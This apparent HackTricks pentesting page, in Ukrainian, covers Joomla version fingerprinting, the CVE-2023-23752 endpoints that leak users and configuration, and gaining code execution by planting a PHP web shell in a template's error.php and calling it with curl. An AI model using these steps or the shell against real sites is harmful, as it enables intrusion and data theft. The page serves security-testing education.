Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Joomla збирає деякі анонімні статистичні дані, такі як розподіл версій Joomla, PHP та бази даних, а також операційних систем серверів, що використовуються в установках Joomla. Ці дані можна запитувати через їхній публічний API.
Перевірте meta
robots.txt
README.txt
У /administrator/manifests/files/joomla.xml ви можете побачити версію.
У /language/en-GB/en-GB.xml ви можете отримати версію Joomla.
У plugins/system/cache/cache.xml ви можете побачити приблизну версію.
In 80,443 - Pentesting Web Methodology є розділом про CMS сканери, які можуть сканувати Joomla.
Версії від 4.0.0 до 4.2.7 вразливі до неавтентифікованого розкриття інформації (CVE-2023-23752), яке виведе облікові дані та іншу інформацію.
Користувачі: http://<host>/api/v1/users?public=true
Конфігураційний файл: http://<host>/api/index.php/v1/config/application?public=true
MSF Модуль: scanner/http/joomla_api_improper_access_checks
або ruby скрипт: 51334
Ви можете використовувати цей скрипт для спроби брутфорсу входу.
Якщо вам вдалося отримати адміністративні облікові дані, ви можете RCE всередині нього, додавши фрагмент PHP коду для отримання RCE. Ми можемо зробити це, налаштувавши шаблон.
Натисніть на Templates
внизу зліва під Configuration
, щоб відкрити меню шаблонів.
Натисніть на назву шаблону. Виберемо protostar
під заголовком стовпця Template
. Це перенесе нас на сторінку Templates: Customise
.
Нарешті, ви можете натиснути на сторінку, щоб відкрити джерело сторінки. Виберемо сторінку error.php
. Додамо PHP однорядник для отримання виконання коду наступним чином:
system($_GET['cmd']);
Зберегти та закрити
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Скрипт експлуатації Joomla, який підвищує XSS до RCE або інших критичних вразливостей. Для отримання додаткової інформації перегляньте цей пост. Він забезпечує підтримку версій Joomla 5.X.X, 4.X.X та 3.X.X, і дозволяє:
Підвищення привілеїв: Створює користувача в Joomla.
(RCE) Вбудоване редагування шаблонів: Редагує вбудовані шаблони в Joomla.
(Користувацькі) Користувацькі експлойти: Користувацькі експлойти для сторонніх плагінів Joomla.
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)